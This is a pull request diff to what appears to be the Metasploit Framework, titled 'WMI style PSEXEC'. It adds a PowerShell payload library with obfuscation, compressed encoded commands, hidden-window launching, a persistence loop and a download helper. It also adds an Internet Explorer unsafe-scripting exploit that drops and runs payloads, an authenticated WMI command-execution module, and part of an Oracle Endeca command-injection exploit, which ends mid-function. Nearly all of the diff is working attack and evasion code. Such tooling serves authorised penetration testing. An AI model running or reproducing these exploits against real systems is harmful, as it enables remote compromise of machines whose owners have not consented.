### PR TITLE
WMI style PSEXEC

### DIFF
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -1,0 +1,330 @@
+# -*- coding: binary -*-
+require 'rex/exploitation/powershell'
+
+module Msf
+module Exploit::Powershell
+
+  class PshScript < Rex::Exploitation::Powershell::Script
+  end
+
+  def initialize(info = {})
+    super
+    register_advanced_options(
+      [
+        OptBool.new('PSH::persist', [true, 'Run the payload in a loop', false]),
+        OptBool.new('PSH::old_technique', [true, 'Use powershell 1.0', false]),
+        OptBool.new('PSH::strip_comments', [false, 'Strip comments', true]),
+        OptBool.new('PSH::strip_whitespace', [false, 'Strip whitespace', false]),
+        OptBool.new('PSH::sub_vars', [false, 'Substitute variable names', false]),
+        OptBool.new('PSH::sub_funcs', [false, 'Substitute function names', false]),
+      ], self.class)
+  end
+
+  #
+  # Reads script into a PshScript
+  #
+  def read_script(script_path)
+    return PshScript.new(script_path)
+  end
+
+  #
+  # Insert substitutions into the powershell script
+  # If script is a path to a file then read the file
+  # otherwise treat it as the contents of a file
+  #
+  def make_subs(script, subs)
+    if ::File.file?(script)
+      script = ::File.read(script)
+    end
+
+    subs.each do |set|
+      script.gsub!(set[0],set[1])
+    end
+
+    return script
+  end
+
+  #
+  # Return an array of substitutions for use in make_subs
+  #
+  def process_subs(subs)
+    return [] if subs.nil? or subs.empty?
+    new_subs = []
+    subs.split(';').each do |set|
+      new_subs << set.split(',', 2)
+    end
+    return new_subs
+  end
+
+  #
+  # Return an encoded powershell script
+  # Will invoke PSH modifiers as enabled
+  #
+  def encode_script(script_in, eof = nil)
+    # Build script object
+    psh = PshScript.new(script_in)
+    # Invoke enabled modifiers
+    datastore.select {|k,v| k =~ /^PSH::(strip|sub)/ and v == 'true' }.keys.map do |k|
+      mod_method = k.split('::').last.intern
+      psh.send(mod_method)
+    end
+    return psh.encode_code(eof)
+  end
+
+  #
+  # Return a gzip compressed powershell script
+  # Will invoke PSH modifiers as enabled
+  #
+  def compress_script(script_in, eof = nil)
+    # Build script object
+    psh = PshScript.new(script_in)
+    # Invoke enabled modifiers
+    datastore.select {|k,v| k =~ /^PSH::(strip|sub)/ and v == 'true' }.keys.map do |k|
+      mod_method = k.split('::').last.intern
+      psh.send(mod_method)
+    end
+    return psh.compress_code(eof)
+  end
+
+  #
+  # Generate a powershell command line
+  #
+  def generate_psh_command_line(opts)
+    if opts[:path] and opts[:path][-1,1] == "\\"
+      opts[:path] << "\\"
+    end
+
+    args = generate_psh_args(opts)
+    return "#{opts[:path]}powershell.exe #{args}"
+  end
+
+  #
+  # Generate arguments for the powershell command
+  #
+  def generate_psh_args(opts)
+    arg_string = ""
+    opts.each_pair do |arg, value|
+      case arg
+      when :encodedcommand
+        arg_string << "-EncodedCommand #{value} " if value
+      when :executionpolicy
+        arg_string << "-ExecutionPolicy #{value} " if value
+      when :inputformat
+        arg_string << "-InputFormat #{value} " if value
+      when :file
+        arg_string << "-File #{value} " if value
+      when :noexit
+        arg_string << "-NoExit " if value
+      when :nologo
+        arg_string << "-NoLogo " if value
+      when :noninteractive
+        arg_string << "-NonInteractive " if value
+      when :mta
+        arg_string << "-Mta " if value
+      when :outputformat
+        arg_string << "-OutputFormat #{value} " if value
+      when :sta
+        arg_string << "-Sta " if value
+      when :noprofile
+        arg_string << "-NoProfile " if value
+      when :windowstyle
+        arg_string << "-WindowStyle #{value} " if  value
+      end
+    end
+
+    #Command must be last (unless from stdin - etc)
+    if opts[:command]
+      arg_string << "-Command #{opts[:command]}"
+    end
+
+    # Shorten args if PSH 2.0+
+    unless datastore['PSH::old_technique']
+      arg_string.gsub!('-Command', '-c')
+      arg_string.gsub!('-EncodedCommand', '-e')
+      arg_string.gsub!('-ExecutionPolicy', '-ep')
+      arg_string.gsub!('-File', '-f')
+      arg_string.gsub!('-InputFormat', '-i')
+      arg_string.gsub!('-NoExit', '-noe')
+      arg_string.gsub!('-NoLogo', '-nol')
+      arg_string.gsub!('-NoProfile', '-nop')
+      arg_string.gsub!('-NonInteractive', '-noni')
+      arg_string.gsub!('-OutputFormat', '-o')
+      arg_string.gsub!('-Sta', '-s')
+      arg_string.gsub!('-WindowStyle', '-w')
+    end
+
+    return arg_string
+  end
+  #
+  # Runs powershell in hidden window raising interactive proc msg
+  # Detect the architecture
+  #
+  def run_hidden_psh(ps_code,payload_arch)
+    arg_opts = {
+        :noprofile => true,
+        :windowstyle => 'hidden',
+        :encodedcommand => ps_code
+    }
+
+    # Old technique fails if powershell exits..
+    arg_opts[:noexit] = true if datastore['PSH::old_technique']
+
+    ps_args = generate_psh_args(arg_opts)
+
+    if payload_arch ==  'x86'
+      arch_x86 = '$True'
+    else
+      arch_x86 = '$False'
+    end
+
+    process_start_info = <<EOS
+$si=New-Object System.Diagnostics.ProcessStartInfo
+$si.FileName=$ps_bin
+$si.Arguments='#{ps_args}'
+$si.UseShellExecute=$false
+$si.RedirectStandardOutput=$true
+$si.WindowStyle='Hidden'
+$si.CreateNoWindow=$true
+$p=[System.Diagnostics.Process]::Start($si)
+EOS
+    process_start_info.gsub!("\n",';')
+
+
+    archictecure_detection = <<EOS
+$x86=#{arch_x86};
+if ([IntPtr]::Size -eq 4) {
+  if ($x86) {
+    $ps_bin='powershell.exe'
+  } else {
+    $ps_bin=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'
+  }
+} else {
+  if ($x86) {
+    $ps_bin=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'
+  } else {
+    $ps_bin='powershell.exe'
+  }
+};
+EOS
+    archictecure_detection.gsub!("\n","")
+    archictecure_detection.gsub!("\s\s","")
+
+    return (archictecure_detection + process_start_info)
+  end
+
+  #
+  # Creates cmd script to execute psh payload
+  #
+  def cmd_psh_payload(pay, payload_arch, opts={})
+    # Allow powershell 1.0 format
+    if opts[:old_psh] || datastore['PSH::old_technique']
+      psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
+    else
+      psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
+    end
+    # Run our payload in a while loop
+    if datastore['PSH::persist']
+      fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
+      sleep_time = rand(5)+5
+      vprint_status("Sleep time set to #{sleep_time} seconds")
+      psh_payload  = "function #{fun_name}{#{psh_payload}};"
+      psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
+    end
+
+    compressed = compress_script(psh_payload)
+    encoded = encode_script(psh_payload)
+
+    if (encoded.length <= compressed.length)
+      smallest_payload = encoded
+    else
+      smallest_payload = compressed
+    end
+
+    # Wrap in hidden runtime / architecture detection
+    final_payload = run_hidden_psh(smallest_payload, payload_arch)
+
+    if opts[:use_single_quotes]
+      # Escape Single Quotes
+      final_payload.gsub!("'","''")
+      # Wrap in quotes
+      final_payload = "'#{final_payload}'"
+    end
+
+    psh_command = generate_psh_command_line({
+                      :noprofile => true,
+                      :windowstyle => 'hidden',
+                      :command => final_payload
+    })
+
+    if opts[:remove_comspec]
+      command = psh_command
+    else
+      command = "%COMSPEC% /b /c #{psh_command}"
+    end
+
+    vprint_status("Command length: #{command.length}")
+    return command
+  end
+
+
+  #
+  # Useful method cache
+  #
+  module PshMethods
+
+    #
+    # Download file to host via PSH
+    #
+    def self.download(src,target=nil)
+      target ||= '$pwd\\' << src.split('/').last
+      return %Q^(new-object System.Net.WebClient).Downloadfile("#{src}", "#{target}")^
+    end
+
+    #
+    # Uninstall app
+    #
+    def self.uninstall(app,fuzzy=true)
+      match = fuzzy ? '-like' : '-eq'
+      return %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
+    end
+
+    #
+    # Create secure string from plaintext
+    #
+    def self.secure_string(str)
+      return %Q^ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$^
+    end
+
+	#
+	# Convert binary to byte array, read from file if able
+	#
+	def build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
+		code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+		code = code.unpack('C*')
+		psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
+		lines = []
+		1.upto(code.length-1) do |byte|
+			if(byte % 10 == 0)
+				lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
+			else
+				lines.push ",0x#{code[byte].to_s(16)}"
+			end
+		end
+		psh << lines.join("") + "\r\n"
+	end
+
+    #
+    # Find PID of file locker
+    #
+    def self.who_locked_file?(filename)
+      return %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
+    end
+
+
+    def self.get_last_login(user)
+      return %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
+    end
+  end
+end
+end
+

--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -1,0 +1,433 @@
+# -*- coding: binary -*-
+
+require 'zlib'
+require 'rex/text'
+
+module Rex
+module Exploitation
+
+module Powershell
+
+	module Output
+
+		def to_s
+			code
+		end
+
+		def size
+			code.size
+		end
+
+		#
+		# Return code with numbered lines
+		#
+		def to_s_lineno
+			numbered = ''
+			code.split(/\r\n|\n/).each_with_index do |line,idx|
+				numbered << "#{idx}: #{line}"
+			end
+			return numbered
+		end
+    #
+    # Return a Base64 encoded powershell code
+    #
+    def encode_code(eof = nil)
+      # Convert expression to unicode
+      unicode_expression = Rex::Text.to_unicode(code)
+
+      # Base64 encode the unicode expression
+      @code = Rex::Text.encode_base64(unicode_expression)
+
+      return code
+    end
+		#
+		# Return a zlib compressed powershell code
+		#
+		def compress_code(eof = nil)
+			# Compress using the Deflate algorithm
+			compressed_stream = Rex::Text.gzip(code)
+
+			# Base64 encode the compressed file contents
+			encoded_stream = Rex::Text.encode_base64(compressed_stream)
+
+			# Build the powershell expression
+			# Decode base64 encoded command and create a stream object
+			psh_expression =  "$stream = New-Object IO.MemoryStream(,"
+			psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
+			# Uncompress and invoke the expression (execute)
+			psh_expression << "$(IEX $(New-Object IO.StreamReader("
+			psh_expression << "$(New-Object IO.Compression.GzipStream("
+			psh_expression << "$stream,"
+			psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
+			psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"
+
+			# If eof is set, add a marker to signify end of code output
+			#if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
+			psh_expression << "echo '#{eof}';" if eof
+
+			# Convert expression to unicode
+			unicode_expression = Rex::Text.to_unicode(psh_expression)
+
+			# Base64 encode the unicode expression
+			@code = Rex::Text.encode_base64(unicode_expression)
+
+			return code
+		end
+
+		#
+		# Reverse the compression process
+		#
+		def decompress_code
+			# Decode base64 and convert to ascii
+			raw = Rex::Text.decode_base64(code)
+			ascii_expression = Rex::Text.to_ascii(raw)
+			# Extract substring with payload
+			encoded_stream = ascii_expression.scan(/FromBase64String\('(.*)'/).flatten.first
+			# Decode and decompress the string
+			return Rex::Text.ungzip( Rex::Text.decode_base64(encoded_stream) )
+			# ::Zlib::Inflate.inflate( Rex::Text.decode_base64(encoded_stream) )
+		end
+	end
+
+	module Parser
+
+		#
+		# Get variable names from code, removes reserved names from return
+		#
+		def get_var_names
+			# Reserved special variables
+			# Acquired with: Get-Variable | Format-Table name, value -auto
+			res_vars = [
+				'$$',
+				'$?',
+				'$^',
+				'$_',
+				'$args',
+				'$ConfirmPreference',
+				'$ConsoleFileName',
+				'$DebugPreference',
+				'$Env',
+				'$Error',
+				'$ErrorActionPreference',
+				'$ErrorView',
+				'$ExecutionContext',
+				'$false',
+				'$FormatEnumerationLimit',
+				'$HOME',
+				'$Host',
+				'$input',
+				'$LASTEXITCODE',
+				'$MaximumAliasCount',
+				'$MaximumDriveCount',
+				'$MaximumErrorCount',
+				'$MaximumFunctionCount',
+				'$MaximumHistoryCount',
+				'$MaximumVariableCount',
+				'$MyInvocation',
+				'$NestedPromptLevel',
+				'$null',
+				'$OutputEncoding',
+				'$PID',
+				'$PROFILE',
+				'$ProgressPreference',
+				'$PSBoundParameters',
+				'$PSCulture',
+				'$PSEmailServer',
+				'$PSHOME',
+				'$PSSessionApplicationName',
+				'$PSSessionConfigurationName',
+				'$PSSessionOption',
+				'$PSUICulture',
+				'$PSVersionTable',
+				'$PWD',
+				'$ReportErrorShowExceptionClass',
+				'$ReportErrorShowInnerException',
+				'$ReportErrorShowSource',
+				'$ReportErrorShowStackTrace',
+				'$ShellId',
+				'$StackTrace',
+				'$true',
+				'$VerbosePreference',
+				'$WarningPreference',
+				'$WhatIfPreference'
+			].map(&:downcase)
+
+
+			our_vars = code.scan(/\$[a-zA-Z\-\_]+/).uniq.flatten.map(&:strip)
+			return our_vars.select {|v| !res_vars.include?(v)}
+		end
+
+		#
+		# Get function names from code
+		#
+		def get_func_names
+			return code.scan(/function\s([a-zA-Z\-\_]+)/).uniq.flatten
+		end
+
+		# Attempt to find string literals in PSH expression
+		def get_string_literals
+			code.scan(/@"(.*)"@|@'(.*)'@/)
+		end
+
+		#
+		# Scan code and return matches with index
+		#
+		def scan_with_index(str,source=code)
+			::Enumerator.new do |y|
+				source.scan(str) do
+					y << ::Regexp.last_match
+				end
+			end.map{|m| [m.to_s,m.offset(0)[0]]}
+		end
+
+		#
+		# Return matching backet type
+		#
+		def match_start(char)
+			case char
+			when '{'
+				'}'
+			when '('
+				')'
+			when '['
+				']'
+			when '<'
+				'>'
+			end
+		end
+
+		#
+		# Extract block of code between inside brackets/parens
+		#
+		# Attempts to match the bracket at idx, handling nesting manually
+		# Once the balanced matching bracket is found, all script content
+		# between idx and the index of the matching bracket is returned
+		#
+		def block_extract(idx)
+			start = code[idx]
+			stop = match_start(start)
+			delims = scan_with_index(/#{Regexp.escape(start)}|#{Regexp.escape(stop)}/,code[idx+1..-1])
+			delims.map {|x| x[1] = x[1] + idx + 1}
+			c = 1
+			sidx = nil
+			# Go through delims till we balance, get idx
+			while not c == 0 and x = delims.shift do
+				sidx = x[1]
+				x[0] == stop ? c -=1 : c+=1
+			end
+			return code[idx..sidx]
+		end
+
+		def get_func(func_name, delete = false)
+			start = code.index(func_name)
+			idx = code[start..-1].index('{') + start
+			func_txt = block_extract(idx)
+			code.delete(ftxt) if delete
+			return Function.new(func_name,func_txt)
+		end
+	end # Parser
+
+	module Obfu
+
+		#
+		# Create hash of string substitutions
+		#
+		def sub_map_generate(strings)
+			map = {}
+			strings.flatten.each do |str|
+				map[str] = "$#{Rex::Text.rand_text_alpha(rand(2)+2)}"
+				# Ensure our variables are unique
+				while not map.values.uniq == map.values
+					map[str] = "$#{Rex::Text.rand_text_alpha(rand(2)+2)}"
+				end
+			end
+			return map
+		end
+
+		#
+		# Remove comments
+		#
+		def strip_comments
+			# Multi line
+			code.gsub!(/<#(.*?)#>/m,'')
+			# Single line
+			code.gsub!(/^#.*$|^\s+#.*$/,'')
+		end
+
+		#
+		# Remove whitespace
+		# This can break some codes using inline .NET
+		#
+		def strip_whitespace
+			code.gsub!(/\s+/,' ')
+		end
+
+
+		#
+		# Identify variables and replace them
+		#
+		def sub_vars
+			# Get list of variables, remove reserved
+			vars = get_var_names
+			# Create map, sub key for val
+			sub_map_generate(vars).each do |var,sub|
+				code.gsub!(var,sub)
+			end
+		end
+
+		#
+		# Identify function names and replace them
+		#
+		def sub_funcs
+			# Find out function names, make map
+			# Sub map keys for values
+			sub_map_generate(get_func_names).each do |var,sub|
+				code.gsub!(var,sub)
+			end
+		end
+
+		#
+		# Perform standard substitutions
+		#
+		def standard_subs(subs = %w{strip_comments strip_whitespace sub_funcs sub_vars} )
+			# Save us the trouble of breaking injected .NET and such
+			subs.delete('strip_whitespace') unless string_literals.empty?
+			# Run selected modifiers
+			subs.each do |modifier|
+				self.send(modifier)
+			end
+			code.gsub!(/^$|^\s+$/,'')
+			return code
+		end
+
+	end # Obfu
+
+	class Param
+		attr_accessor :klass, :name
+		def initialize(klass,name)
+			@klass = klass.strip.gsub(/\[|\]|\s/,'')
+			@name = name.strip.gsub(/\s|,/,'')
+		end
+
+		def to_s
+			"[#{klass}]$#{name}"
+		end
+	end
+
+	class Function
+		attr_accessor :code, :name, :params
+
+		include Output
+		include Parser
+		include Obfu
+
+		def initialize(name,code)
+			@name = name
+			@code = code
+			populate_params
+		end
+		def to_s
+			"function #{name} #{code}"
+		end
+
+		def populate_params
+			@params = []
+			start = code.index(/param\s+\(|param\(/im)
+			return unless start
+			# Get start of our block
+			idx = scan_with_index('(',code[start..-1]).first.last + start
+			pclause = block_extract(idx)
+			# Keep lines which declare a variable of some class
+			vars = pclause.split(/\n|;/).select {|e| e =~ /\]\$\w/}
+			vars.map! {|v| v.split('=',2).first}.map(&:strip)
+			# Ignore assignment, create params with class and variable names
+			vars.map {|e| e.split('$')}.each do |klass,name|
+				@params << Param.new(klass,name)
+			end
+		end
+	end
+
+	class Script
+		attr_accessor :code
+		attr_reader :functions
+
+		include Output
+		include Parser
+		include Obfu
+		# Pretend we are actually a string
+		extend Forwardable
+		# In case someone messes with String we delegate based on its instance methods
+		eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
+
+		# def method_missing(meth, *args, &block)
+		#   code.send(meth,*args,&block) || (raise NoMethodError.new, meth)
+		# end
+
+		def initialize(code)
+			@code = ''
+			begin
+				# Open code file for reading
+				fd = ::File.new(code, 'rb')
+				while (line = fd.gets)
+					@code << line
+				end
+
+				# Close open file
+				fd.close
+			rescue Errno::ENAMETOOLONG, Errno::ENOENT
+				# Treat code as a... code
+				@code = code.to_s.dup # in case we're eating another script
+			end
+			@functions = get_func_names.map {|f| get_func(f)}
+		end
+
+
+		##
+		# Class methods
+		##
+
+    #
+    # Convert binary to byte array, read from file if able
+    #
+    def self.to_byte_array(input_data,var_name="buf")
+      return "[Byte[]]$#{name} = ''" if input_data.nil? or input_data.empty?
+
+      code = input_data.unpack('C*')
+      psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
+      lines = []
+      1.upto(code.length-1) do |byte|
+        if(byte % 10 == 0)
+          lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
+        else
+          lines.push ",0x#{code[byte].to_s(16)}"
+        end
+      end
+
+      return psh << lines.join("") + "\r\n"
+    end
+
+		#
+		# Build a byte array to load into powershell code
+		#
+		def self.build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
+			code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+			return to_byte_array(input_data,var_name)
+		end
+
+		def self.psp_funcs(dir)
+			scripts = Dir.glob(File.expand_path(dir) + '/**/*').select {|e| e =~ /ps1$|psm1$/}
+			functions = scripts.map {|s| puts s; Script.new(s).functions}
+			return functions.flatten
+		end
+
+		#
+		# Return list of code modifier methods
+		#
+		def self.code_modifiers
+			self.instance_methods.select {|m| m =~ /^(strip|sub)/}
+		end
+	end # class Script
+
+end
+end
+end

--- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb
+++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb
@@ -1,0 +1,133 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/util/exe'
+require 'msf/core/exploit/powershell'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Internet Explorer Unsafe Scripting Misconfiguration',
+      'Description'    => %q{
+        This exploit takes advantage of the "Initialize and script ActiveX controls not
+      marked safe for scripting" setting within Internet Explorer.  When this option is set,
+      IE allows access to the WScript.Shell ActiveX control, which allows javascript to
+      interact with the file system and run commands.  This security flaw is not uncommon
+      in corporate environments for the 'Intranet' or 'Trusted Site' zones.
+
+        When set via domain policy, the most common registry entry to modify is HKLM\
+      Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201,
+      which if set to '0' forces ActiveX controls not marked safe for scripting to be
+      enabled for the Intranet zone.
+
+        This module creates a javascript/html hybrid that will render correctly either
+      via a direct GET http://msf-server/ or as a javascript include, such as in:
+      http://intranet-server/xss.asp?id="><script%20src=http://10.10.10.10/ie_unsafe_script.js>
+      </script>.
+
+        IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from
+      an x64 iexplore.exe.
+      },
+
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'natron',
+          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # PSH and remove ADODB.Stream
+        ],
+        'References'     =>
+        [
+          [ 'URL', 'http://support.microsoft.com/kb/182569' ],
+          [ 'URL', 'http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html' ],
+          [ 'URL', 'http://support.microsoft.com/kb/870669']
+        ],
+        'DisclosureDate' => 'Sep 20 2010',
+        'Platform'       => 'win',
+        'Targets'	 =>
+          [
+            [ 'Windows x86/x64', { 'Arch' => ARCH_X86 } ]
+          ],
+        'DefaultOptions' =>
+          {
+            'HTTP::compression' => 'gzip'
+          },
+        'DefaultTarget'  => 0))
+
+    register_options(
+        [
+            OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]),
+        ], self.class
+    )
+  end
+
+  def on_request_uri(cli, request)
+
+    # Build out the HTML response page
+    var_shellobj		= rand_text_alpha(rand(5)+5)
+
+    p = regenerate_payload(cli)
+    if datastore['TECHNIQUE'] == 'VBS'
+      js_content = vbs_technique(var_shellobj, p)
+    else
+      js_content = psh_technique(var_shellobj, p)
+    end
+
+    print_status("Request received for #{request.uri}")
+    print_status("Sending exploit html/javascript");
+
+    # Transmit the response to the client
+    send_response(cli, js_content, { 'Content-Type' => 'text/html' })
+
+    # Handle the payload
+    handler(cli)
+  end
+
+  def vbs_technique(var_shellobj, p)
+    var_fsobj               = rand_text_alpha(rand(5)+5)
+    var_fsobj_file          = rand_text_alpha(rand(5)+5)
+    var_vbsname             = rand_text_alpha(rand(5)+5)
+    var_writedir            = rand_text_alpha(rand(5)+5)
+
+    exe = generate_payload_exe({ :code => p.encoded })
+    vbs = Msf::Util::EXE.to_exe_vbs(exe)
+    vbs_content =  Rex::Text.to_hex(vbs)
+
+    # Build the javascript that will be served
+    js_content  = %Q|
+//<html><head></head><body><script>
+var #{var_shellobj} = new ActiveXObject("WScript.Shell");
+var #{var_fsobj}    = new ActiveXObject("Scripting.FileSystemObject");
+var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%");
+var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs",2,true);
+
+#{var_fsobj_file}.Write(unescape("#{vbs_content}"));
+#{var_fsobj_file}.Close();
+
+#{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
+#{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
+//</script></html>
+|
+    return js_content
+  end
+
+  def psh_technique(var_shellobj, p)
+    cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first))
+    js_content = %Q|
+//<html><head></head><body><script>
+var #{var_shellobj} = new ActiveXObject("WScript.Shell");
+#{var_shellobj}.run(unescape("#{cmd}"), 1, true);
+//</script></html>
+|
+
+    return js_content
+  end
+end

--- a/modules/exploits/windows/dcerpc/wmis_psh.rb
+++ b/modules/exploits/windows/dcerpc/wmis_psh.rb
@@ -22,6 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
 
       'Author'         => [
+        'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
       ],
 
       'License'        => MSF_LICENSE,

--- a/modules/exploits/windows/dcerpc/wmis_psh.rb
+++ b/modules/exploits/windows/dcerpc/wmis_psh.rb
@@ -1,0 +1,80 @@
+# -*- coding: binary -*-
+
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Exploit::Remote::SMB::Authenticated
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Microsoft Windows Authenticated Powershell Command Execution',
+      'Description'    => %q{
+      },
+
+      'Author'         => [
+      ],
+
+      'License'        => MSF_LICENSE,
+      'Privileged'     => true,
+      'DefaultOptions' =>
+        {
+          'WfsDelay'     => 20,
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 01 1999',
+      'References'     => [
+        [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
+        [ 'OSVDB', '3106'],
+        [ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ],
+        [ 'URL', 'http://sourceforge.net/projects/smbexec/' ],
+        [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
+      ]
+    ))
+  end
+
+  def exploit
+    command = cmd_psh_payload(payload.encoded,
+                              payload_instance.arch.first,
+                              {:remove_comspec => true})
+
+    if datastore['PERSIST'] and not datastore['DisablePayloadHandler']
+      print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PERSIST option.")
+    end
+
+    if datastore['RUN_WOW64'] and target_arch.first == "x86_64"
+      fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled")
+    end
+
+    user = datastore['SMBUser']
+    pass = datastore['SMBPass']
+    domain = "#{datastore['SMBDomain']}/" if datastore['SMBDomain']
+
+    command.gsub!("$","\\\\$")
+
+    local_command = "pth-wmis -U #{domain}#{user}%#{pass} //#{datastore['RHOST']} \"#{command}\""
+
+    system(local_command)
+  end
+
+  def peer
+    return "#{datastore['RHOST']}:#{datastore['RPORT']}"
+  end
+end
+

--- a/modules/exploits/windows/http/oracle_endeca_exec.rb
+++ b/modules/exploits/windows/http/oracle_endeca_exec.rb
@@ -1,0 +1,154 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize
+    super(
+      'Name'        	=> 'Oracle Endeca Server Remote Command Execution',
+      'Description'   => %q{
+        This module exploits a command injection vulnerability on the Oracle Endeca
+        Server 7.4.0. The vulnerability exists on the createDataStore method from the
+        controlSoapBinding web service. The vulnerable method only exists on the 7.4.0
+        branch and isn't available on the 7.5.5.1 branch. In addition, the injection
+        has been found to be Windows specific. This module has been tested successfully
+        on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).
+      },
+      'Author'      => [
+        'rgod <rgod[at]autistici.org>', # Vulnerability discovery
+        'juan vazquez' # Metasploit module
+      ],
+      'Platform'    => 'win',
+      'Arch'        => [ ARCH_X86_64, ARCH_X86 ],
+      'References'  =>
+        [
+          [ 'CVE', '2013-3763' ],
+          [ 'BID', '61217' ],
+          [ 'OSVDB', '95269' ],
+          [ 'ZDI', '13-190' ],
+          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html' ]
+        ],
+      'Targets'     =>
+        [
+          [ 'Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'Privileged'     => false,
+      'DisclosureDate' => 'Jul 16 2013'
+    )
+
+    register_options(
+      [
+        Opt::RPORT(7770),
+        OptString.new('TARGETURI', [true, 'The URI path of the Control Web Service', '/ws/control'])
+      ], self.class)
+  end
+
+  def version_soap
+    soap = <<-eos
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="http://www.endeca.com/endeca-server/control/1/0">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <ns:version/>
+   </soapenv:Body>
+</soapenv:Envelope>
+    eos
+
+    return soap
+  end
+
+  def create_data_store_soap(name, files)
+    soap = <<-eos
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="http://www.endeca.com/endeca-server/control/1/0">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <ns:createDataStore>
+         <ns:dataStoreConfig>
+            <ns:name>#{name}</ns:name>
+            <ns:dataFiles>#{files}</ns:dataFiles>
+         </ns:dataStoreConfig>
+      </ns:createDataStore>
+   </soapenv:Body>
+</soapenv:Envelope>
+    eos
+
+    return soap
+  end
+
+  def check
+
+    res = send_request_soap(version_soap)
+
+    if res.nil? or res.code != 200 or res.body !~ /versionResponse/
+      return Exploit::CheckCode::Safe
+    end
+
+    version_match = res.body.match(/<serverVersion>Oracle Endeca Server ([0-9\.]*) /)
+
+    if version_match.nil?
+      return Exploit::CheckCode::Unknown
+    else
+      version = version_match[1]
+    end
+
+    print_status("#{peer} - Version found: Oracle Endeca Server #{version}")
+
